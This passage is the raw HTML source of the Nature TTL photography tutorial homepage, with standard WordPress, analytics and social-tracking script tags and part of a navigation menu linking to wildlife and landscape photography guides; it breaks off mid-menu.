<!doctype html> <html lang="en-GB" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <style> .egg-container .cegg-list-withlogos .cegg-image-cell img {max-width:200px} </style> <title>Wildlife and Landscape Photography Tips and Tutorials | Nature TTL</title> <meta name="description" content="Welcome to Nature TTL! We provide free tips, tutorials, inspiration, and equipment reviews for wildlife, landscape and macro photographers. Look no further!" /> <link rel="canonical" href="https://www.naturettl.com/" /> <meta name="p:domain_verify" content="fe32a98faab6426dbe78d606e0e83164" /> <link rel='dns-prefetch' href='//www.google.com' /> <link rel='dns-prefetch' href='//scripts.mediavine.com' /> <link rel='dns-prefetch' href='//checkout.stripe.com' /> <link rel='dns-prefetch' href='//a.optmnstr.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript" data-cfasync="false"> var mi_version = '7.4.2'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-28192213-2'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-28192213-2', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('require', 'linkid', 'linkid.js'); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); } </script> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.naturettl.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.naturettl.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://www.naturettl.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='twenty-twenty-css' href='https://www.naturettl.com/wp-content/plugins/smart-before-after-viewer/includes/twentytwenty/css/twentytwenty.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wordpress-popular-posts-css-css' href='https://www.naturettl.com/wp-content/plugins/wordpress-popular-posts/public/css/wpp.css?ver=4.2.2' type='text/css' media='all' /> <link rel='stylesheet' id='stripe-checkout-button-css' href='https://checkout.stripe.com/v3/checkout/button.css?ver=2.5.5' type='text/css' media='all' /> <link rel='stylesheet' id='stripe-checkout-pro-pikaday-css' href='https://www.naturettl.com/wp-content/plugins/wp-simple-pay-pro-for-stripe/assets/css/vendor/pikaday.min.css?ver=2.5.5' type='text/css' media='all' /> <link rel='stylesheet' id='stripe-checkout-pro-public-lite-css' href='https://www.naturettl.com/wp-content/plugins/wp-simple-pay-pro-for-stripe/assets/css/shared-public-main.min.css?ver=2.5.5' type='text/css' media='all' /> <link rel='stylesheet' id='stripe-checkout-pro-public-css' href='https://www.naturettl.com/wp-content/plugins/wp-simple-pay-pro-for-stripe/assets/css/pro-public.min.css?ver=2.5.5' type='text/css' media='all' /> <link rel='stylesheet' id='easy-social-share-buttons-css' href='https://www.naturettl.com/wp-content/plugins/easy-social-share-buttons3/assets/css/easy-social-share-buttons.css?ver=6.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='fancybox-css' href='https://www.naturettl.com/wp-content/plugins/easy-fancybox/css/jquery.fancybox.1.3.23.min.css' type='text/css' media='screen' /> <link rel='stylesheet' id='ubermenu-css' href='https://www.naturettl.com/wp-content/plugins/ubermenu/pro/assets/css/ubermenu.min.css?ver=3.5' type='text/css' media='all' /> <link rel='stylesheet' id='ubermenu-font-awesome-all-css' href='https://www.naturettl.com/wp-content/plugins/ubermenu/assets/fontawesome/css/all.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='sage/css-css' href='https://www.naturettl.com/wp-content/themes/naturettl/dist/styles/main.css' type='text/css' media='all' /> <script type='text/javascript' src='https://www.naturettl.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.naturettl.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var ceggPriceAlert = {"ajaxurl":"https:\/\/www.naturettl.com\/wp-admin\/admin-ajax.php","nonce":"8bf0a31a00"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/content-egg/res/js/price_alert.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"[]","home_url":"https:\/\/www.naturettl.com","hash_tracking":"false"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.4.2'></script> <script type='text/javascript' src='//www.google.com/jsapi?ver=5.1.1'></script> <script type='text/javascript' async="async" data-noptimize="1" data-cfasync="false" src='//scripts.mediavine.com/tags/nature-ttl.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/smart-before-after-viewer/includes/twentytwenty/js/jquery.event.move.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/smart-before-after-viewer/includes/twentytwenty/js/jquery.twentytwenty.min.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpp_params = {"sampling_active":"0","sampling_rate":"100","ajax_url":"https:\/\/www.naturettl.com\/wp-json\/wordpress-popular-posts\/v1\/popular-posts\/","ID":"","token":"92158f0c9d","debug":""}; /* ]]> */ </script> <script type='text/javascript' src='https://www.naturettl.com/wp-content/plugins/wordpress-popular-posts/public/js/wpp-4.2.0.min.js?ver=4.2.2'></script> <script type='text/javascript' data-cfasync="false" id="omapi-script" async="async" src='https://a.optmnstr.com/app/js/api.min.js'></script> <link rel='https://api.w.org/' href='https://www.naturettl.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.naturettl.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.naturettl.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel="alternate" type="application/json+oembed" href="https://www.naturettl.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.naturettl.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.naturettl.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.naturettl.com%2F&#038;format=xml" /> <script type="text/javascript">var ajaxurl = "https://www.naturettl.com/wp-admin/admin-ajax.php";</script><style id="ubermenu-custom-generated-css"> /** Font Awesome 4 Compatibility **/ .fa{font-style:normal;font-variant:normal;font-weight:normal;font-family:FontAwesome;} /** UberMenu Custom Menu Styles (Customizer) **/ /* main */ .ubermenu.ubermenu-main { background:none; border:none; box-shadow:none; } .ubermenu.ubermenu-main .ubermenu-item-level-0 > .ubermenu-target { border:none; box-shadow:none; } .ubermenu.ubermenu-main.ubermenu-horizontal .ubermenu-submenu-drop.ubermenu-submenu-align-left_edge_bar, .ubermenu.ubermenu-main.ubermenu-horizontal .ubermenu-submenu-drop.ubermenu-submenu-align-full_width { left:0; } .ubermenu.ubermenu-main.ubermenu-horizontal .ubermenu-item-level-0.ubermenu-active > .ubermenu-submenu-drop, .ubermenu.ubermenu-main.ubermenu-horizontal:not(.ubermenu-transition-shift) .ubermenu-item-level-0 > .ubermenu-submenu-drop { margin-top:0; } .ubermenu-main.ubermenu-transition-fade .ubermenu-item .ubermenu-submenu-drop { margin-top:0; } .ubermenu-main .ubermenu-item-level-0 > .ubermenu-target, .ubermenu-main .ubermenu-item-level-0 > .ubermenu-custom-content.ubermenu-custom-content-padded { padding-top:40px; padding-bottom:40px; } .ubermenu-main .ubermenu-submenu.ubermenu-submenu-drop { background-color:#1c1c18; } .ubermenu-main .ubermenu-item-level-0 > .ubermenu-submenu-drop { box-shadow:none; } /** UberMenu Custom Menu Item Styles (Menu Item Settings) **/ /* 7240 */ .ubermenu .ubermenu-item.ubermenu-item-7240 > .ubermenu-target { color:#ededed; } /** UberMenu Custom Tweaks (General Settings) **/ @media all and (max-width: 1199px) and (min-width: 991px) { .ubermenu-main .ubermenu-item-level-0>.ubermenu-target, .ubermenu-main .ubermenu-item-level-0>.ubermenu-custom-content.ubermenu-custom-content-padded { padding-top:10px !important; padding-bottom:10px !important; } } .ubermenu-sub-indicator { display:none; } /** UberMenu Custom Tweaks - Desktop **/ @media screen and (min-width:960px){ .ubermenu .ubermenu-item-layout-image_left>.ubermenu-target-text { padding-left:0px !important; } } /* Status: Loaded from Transient */ </style> <script type="text/javascript">var essb_settings = {"ajax_url":"https:\/\/www.naturettl.com\/wp-admin\/admin-ajax.php","essb3_nonce":"c8a296c06f","essb3_plugin_url":"https:\/\/www.naturettl.com\/wp-content\/plugins\/easy-social-share-buttons3","essb3_facebook_total":true,"essb3_admin_ajax":false,"essb3_internal_counter":true,"essb3_counter_button_min":0,"essb3_counter_total_min":20,"essb3_no_counter_mailprint":false,"essb3_single_ajax":false,"ajax_type":"wp","twitter_counter":"newsc","google_counter":"","essb3_stats":true,"essb3_ga":false,"essb3_ga_mode":"simple","blog_url":"https:\/\/www.naturettl.com\/","essb3_postfloat_stay":false,"post_id":679};</script> <meta name="onesignal" content="wordpress-plugin" /> <link rel="manifest" href="https://www.naturettl.com/wp-content/plugins/onesignal-free-web-push-notifications/sdk_files/manifest.json.php?gcm_sender_id=" /> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async></script> <script> window.OneSignal = window.OneSignal || []; OneSignal.push( function() { OneSignal.SERVICE_WORKER_UPDATER_PATH = "OneSignalSDKUpdaterWorker.js.php"; OneSignal.SERVICE_WORKER_PATH = "OneSignalSDKWorker.js.php"; OneSignal.SERVICE_WORKER_PARAM = { scope: '/' }; OneSignal.setDefaultNotificationUrl("https://www.naturettl.com"); var oneSignal_options = {}; window._oneSignalInitOptions = oneSignal_options; oneSignal_options['wordpress'] = true; oneSignal_options['appId'] = 'eaf6c43d-0852-426a-b72d-43a6983e65f2'; oneSignal_options['autoRegister'] = false; oneSignal_options['welcomeNotification'] = { }; oneSignal_options['welcomeNotification']['title'] = ""; oneSignal_options['welcomeNotification']['message'] = ""; oneSignal_options['path'] = "https://www.naturettl.com/wp-content/plugins/onesignal-free-web-push-notifications/sdk_files/"; oneSignal_options['safari_web_id'] = "web.onesignal.auto.3a3b4186-8f32-4bbf-a810-be3f3be590a9"; oneSignal_options['persistNotification'] = true; oneSignal_options['promptOptions'] = { }; oneSignal_options['notifyButton'] = { }; oneSignal_options['notifyButton']['enable'] = true; oneSignal_options['notifyButton']['position'] = 'bottom-right'; oneSignal_options['notifyButton']['theme'] = 'default'; oneSignal_options['notifyButton']['size'] = 'medium'; oneSignal_options['notifyButton']['prenotify'] = true; oneSignal_options['notifyButton']['displayPredicate'] = function() { return OneSignal.isPushNotificationsEnabled() .then(function(isPushEnabled) { return !isPushEnabled; }); }; oneSignal_options['notifyButton']['showCredit'] = true; oneSignal_options['notifyButton']['text'] = {}; oneSignal_options['notifyButton']['text']['message.prenotify'] = 'Get notified when we post new content!'; OneSignal.init(window._oneSignalInitOptions); }); function documentInitOneSignal() { var oneSignal_elements = document.getElementsByClassName("OneSignal-prompt"); var oneSignalLinkClickHandler = function(event) { OneSignal.push(['registerForPushNotifications']); event.preventDefault(); }; for(var i = 0; i < oneSignal_elements.length; i++) oneSignal_elements[i].addEventListener('click', oneSignalLinkClickHandler, false); } if (document.readyState === 'complete') { documentInitOneSignal(); } else { window.addEventListener("load", function(event){ documentInitOneSignal(); }); } </script> <meta name="wpsso:mark:begin" content="wpsso meta tags begin" /> <meta name="generator" content="WPSSO Core 4.26.0/L" /> <meta name="generator" content="WPSSO UM 1.18.0/F" /> <meta property="fb:admins" content="wrnicholls" /> <meta property="og:type" content="website" /> <meta property="og:url" content="https://www.naturettl.com/" /> <meta property="og:locale" content="en_GB" /> <meta property="og:site_name" content="Nature TTL" /> <meta property="og:title" content="Nature TTL | Nature Photography Tips &amp; Tutorials" /> <meta property="og:description" content="Welcome to Nature TTL! We provide free tips, tutorials, inspiration &amp; equipment reviews for wildlife and landscape photographers. Look no further!" /> <meta property="og:updated_time" content="2019-05-06T09:18:45+00:00" /> <meta property="og:image" content="https://www.naturettl.com/wp-content/uploads/2016/07/slider-image-600x315.jpg" /> <meta property="og:image:width" content="600" /> <meta property="og:image:height" content="315" /> <meta name="twitter:domain" content="www.naturettl.com" /> <meta name="twitter:site" content="@NatureTTL" /> <meta name="twitter:title" content="Nature TTL | Nature Photography Tips &amp; Tutorials" /> <meta name="twitter:description" content="Welcome to Nature TTL! We provide free tips, tutorials, inspiration &amp; equipment reviews for wildlife and landscape photographers. Look no further!" /> <meta name="twitter:creator" content="NatureTTL" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:image" content="https://www.naturettl.com/wp-content/uploads/2016/07/slider-image-800x470.jpg" /> <link itemprop="url" href="https://www.naturettl.com/" /> <meta itemprop="name" content="Nature TTL | Nature Photography Tips &amp; Tutorials" /> <meta itemprop="description" content="Welcome to Nature TTL! We provide free tips, tutorials, inspiration &amp; equipment reviews for wildlife and landscape photographers. Look no further!" /> <link itemprop="image" href="https://www.naturettl.com/wp-content/uploads/2016/07/slider-image-800x470.jpg" /> <meta name="thumbnail" content="https://www.naturettl.com/wp-content/uploads/2016/07/slider-image-600x315.jpg" /> <script type="application/ld+json">{"@id":"https://www.naturettl.com/#id/website","@context":"https://schema.org","@type":"WebSite","url":"https://www.naturettl.com/","name":"Nature TTL","description":"The best resource online for nature photography tutorials, inspiration and equipment reviews!","potentialAction":[{"@context":"https://schema.org","@type":"SearchAction","target":"https://www.naturettl.com?s={search_term_string}","query-input":"required name=search_term_string"}]}</script> <script type="application/ld+json">{"@id":"https://www.naturettl.com#id/organization","@context":"https://schema.org","@type":"Organization","url":"https://www.naturettl.com","name":"Nature TTL","description":"The best resource online for nature photography tutorials, inspiration and equipment reviews!","logo":{"@context":"https://schema.org","@type":"ImageObject","url":"https://www.naturettl.com/wp-content/uploads/2016/12/300dpi.jpg","width":2967,"height":2417},"sameAs":["http://www.facebook.com/NatureTTL","http://www.instagram.com/nature.ttl","https://twitter.com/NatureTTL","https://www.youtube.com/naturettl"]}</script> <meta name="wpsso:mark:end" content="wpsso meta tags end" /> <link rel="icon" href="https://www.naturettl.com/wp-content/uploads/2016/11/cropped-siteicon-wordpress-32x32.png" sizes="32x32" /> <link rel="icon" href="https://www.naturettl.com/wp-content/uploads/2016/11/cropped-siteicon-wordpress-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://www.naturettl.com/wp-content/uploads/2016/11/cropped-siteicon-wordpress-180x180.png" /> <meta name="msapplication-TileImage" content="https://www.naturettl.com/wp-content/uploads/2016/11/cropped-siteicon-wordpress-270x270.png" /> <script src="//cdn.geni.us/snippet.min.js" defer></script> <script type="text/javascript"> jQuery(document).ready(function( $ ) { var ale_on_click_checkbox_is_checked=""; if(ale_on_click_checkbox_is_checked) { Georiot.amazon.addOnClickRedirect(17394, false); } else { Georiot.amazon.convertToGeoRiotLinks(17394, false); }; }); </script> <script> var _prum = [['id', '59863c26a834087b163b8175'], ['mark', 'firstbyte', (new Date()).getTime()]]; (function() { var s = document.getElementsByTagName('script')[0] , p = document.createElement('script'); p.async = 'async'; p.src = '//rum-static.pingdom.net/prum.min.js'; s.parentNode.insertBefore(p, s); })(); </script> <script> function EJEJC_lc(th) { return false; }; </script> <script src="https://www.e-junkie.com/ecom/box.js" type="text/javascript"></script> <script>(function() { var _fbq = window._fbq || (window._fbq = []); if (!_fbq.loaded) { var fbds = document.createElement('script'); fbds.async = true; fbds.src = '//connect.facebook.net/en_US/fbds.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(fbds, s); _fbq.loaded = true; } _fbq.push(['addPixelId', '657929320966588']); })(); window._fbq = window._fbq || []; window._fbq.push(['track', 'PixelInitialized', {}]); </script> <noscript><img height="1" width="1" alt="" style="display:none" src="https://www.facebook.com/tr?id=657929320966588&ev=NoScript" /></noscript> </head> <body class="home page-template-default page page-id-679 sidebar-primary"> <!--[if IE]> <div class="alert alert-warning"> You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience. </div> <![endif]--> <header class="Site-header"> <div class="container"> <div class="row"> <div class="col-xs-6 col-sm-2"> <a href="/"> <img src="https://www.naturettl.com/wp-content/themes/naturettl/dist/images/logo.png" alt="NatureTTL Logo" width="80" class="Site-header__logo"> </a> </div> <div class="hidden-xs hidden-sm col-md-9 Site-header__flex"> <div class="Primary-nav"> <nav id="ubermenu-main-2-primary_navigation" class="ubermenu ubermenu-nojs ubermenu-main ubermenu-menu-2 ubermenu-loc-primary_navigation ubermenu-responsive-collapse ubermenu-horizontal ubermenu-transition-none ubermenu-trigger-hover_intent ubermenu-skin-none ubermenu-bar-align-full ubermenu-items-align-left ubermenu-disable-submenu-scroll ubermenu-sub-indicators ubermenu-retractors-responsive ubermenu-submenu-indicator-closes"><ul id="ubermenu-nav-main-2-primary_navigation" class="ubermenu-nav"><li id="menu-item-13581" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-13581 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.naturettl.com/start-here/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Start Here</span></a></li><li id="menu-item-6417" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-6417 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-mega"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only ubermenu-noindicator" href="/photography-tutorials/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Tutorials</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-6417 ubermenu-submenu-type-auto ubermenu-submenu-type-mega ubermenu-submenu-drop ubermenu-submenu-align-full_width"><li id="menu-item-6425" class="ubermenu-item ubermenu-tabs ubermenu-item-6425 ubermenu-item-level-1 ubermenu-column ubermenu-column-full ubermenu-tab-layout-left ubermenu-tabs-show-default ubermenu-tabs-show-current"><ul class="ubermenu-tabs-group ubermenu-column ubermenu-column-1-4 ubermenu-submenu ubermenu-submenu-id-6425 ubermenu-submenu-type-auto ubermenu-submenu-type-tabs-group"><li id="menu-item-6419" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-6419 ubermenu-item-auto ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/photography-tutorials/wildlife-tutorials/"><span class="ubermenu-target-title ubermenu-target-text">Wildlife</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-6419 ubermenu-submenu-type-tab-content-panel"><li class=" ubermenu-autocolumn menu-item-6420-col-0 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6420-col-0"><ul class="ubermenu-submenu ubermenu-submenu-id-6420-col-0 ubermenu-submenu-type-stack"><li id="menu-item-6420-post-14424" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6420 ubermenu-item-6420-post-14424 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/photograph-reptiles-uk/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/04/photograph-reptiles-uk-4-560x370.jpg" width="560" height="370" alt="photograph-reptiles-uk-4" /><span class="ubermenu-target-title ubermenu-target-text">How to Photograph Reptiles in the UK</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6420-col-1 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6420-col-1"><ul class="ubermenu-submenu ubermenu-submenu-id-6420-col-1 ubermenu-submenu-type-stack"><li id="menu-item-6420-post-14157" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6420 ubermenu-item-6420-post-14157 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/find-locations-wildlife-photography/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/03/find-locations-wildlife-photography-3-560x370.jpg" width="560" height="370" alt="find-locations-wildlife-photography-3" /><span class="ubermenu-target-title ubermenu-target-text">How to Find Locations for Wildlife Photography</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6420-col-2 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6420-col-2"><ul class="ubermenu-submenu ubermenu-submenu-id-6420-col-2 ubermenu-submenu-type-stack"><li id="menu-item-6420-post-14018" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6420 ubermenu-item-6420-post-14018 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/tips-photographing-wading-birds/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/02/photographing-wading-birds-8-560x370.jpg" width="560" height="370" alt="photographing-wading-birds-8" /><span class="ubermenu-target-title ubermenu-target-text">5 Tips for Photographing Wading Birds</span></a></li></ul></li></ul></li><li id="menu-item-6422" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-6422 ubermenu-item-auto ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/photography-tutorials/landscape-tutorials"><span class="ubermenu-target-title ubermenu-target-text">Landscape</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-6422 ubermenu-submenu-type-tab-content-panel"><li class=" ubermenu-autocolumn menu-item-6421-col-0 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6421-col-0"><ul class="ubermenu-submenu ubermenu-submenu-id-6421-col-0 ubermenu-submenu-type-stack"><li id="menu-item-6421-post-14609" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6421 ubermenu-item-6421-post-14609 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/how-to-photograph-bluebells/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/05/photograph-bluebells-11-560x370.jpg" width="560" height="370" alt="photograph bluebells-11" /><span class="ubermenu-target-title ubermenu-target-text">How to Photograph Bluebells</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6421-col-1 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6421-col-1"><ul class="ubermenu-submenu ubermenu-submenu-id-6421-col-1 ubermenu-submenu-type-stack"><li id="menu-item-6421-post-14246" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6421 ubermenu-item-6421-post-14246 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/best-settings-night-photography/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/03/best-settings-night-photography-17-560x370.jpg" width="560" height="370" alt="best-settings-night-photography-17" /><span class="ubermenu-target-title ubermenu-target-text">The Best Settings for Night Photography</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6421-col-2 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6421-col-2"><ul class="ubermenu-submenu ubermenu-submenu-id-6421-col-2 ubermenu-submenu-type-stack"><li id="menu-item-6421-post-14035" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6421 ubermenu-item-6421-post-14035 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/photograph-lunar-eclipse/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/02/photograph-lunar-eclipse-8-560x370.jpg" width="560" height="370" alt="photograph lunar eclipse-8" /><span class="ubermenu-target-title ubermenu-target-text">How to Photograph a Lunar 